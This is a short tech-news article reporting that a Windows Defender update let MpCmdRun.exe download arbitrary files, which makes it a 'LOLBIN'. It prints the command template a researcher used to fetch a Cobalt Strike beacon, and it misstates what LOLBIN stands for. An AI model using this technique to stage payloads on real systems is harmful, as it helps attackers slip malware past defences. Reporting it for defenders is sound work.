Windows Defender turns into a dangerous app for admins

Claudiu Andone
by Claudiu Andone
Windows & Software Expert
0 Comments
Download PDF

  • Windows Defender in Windows 10 is a great tool for defending your system but a new update turned it into a threat.
  • A new DownloadFile command can be used to download any external file, including malware on your computer.
  • Explore our Software section for the best articles about most recent digital tools.
  • If you're interested in the latest Windows 10 articles, visit our comprehensive Windows 10 Hub.
Windows Defender turns into a LOLBIN

Windows Defender in Windows 10 is the first line of defence in case of malware attacks and it does a pretty good job too.

However, in one of its new updates, the mighty antivirus got a new DownloadFile command, that will allow anyone to download any file from an URL to a certain path on your computer.

We can call this an exploit since it could also be used to even download malware, a thing that was discovered by security researcher Mohammad Askar who posted his finding on Twitter.

How can Windows Defender be used to download malware?

It’s really simple to use the Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) to download any file from an external source to your computer.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

In his try, Askar was able to download Cobalt Strike beacon, a well-known attacker tool using this command line.

The new command is included in version 4.18.2007.8-0 and up which gives a pretty good start time for attackers.

Basically, this feature turns Windows Defender into a LOLBIN (living off the line binaries), a harmless system file that can be used for malicious purposes.

Fortunately, after you download the harmful file, it will be detected by the same Windows Defender or by another antivirus software if present.

From a reliable protection software, Windows Defender turned into another possible threat that will have to be closely monitored by admins and security experts.

If you have any suggestions or comments, please leave them below in the Comments section.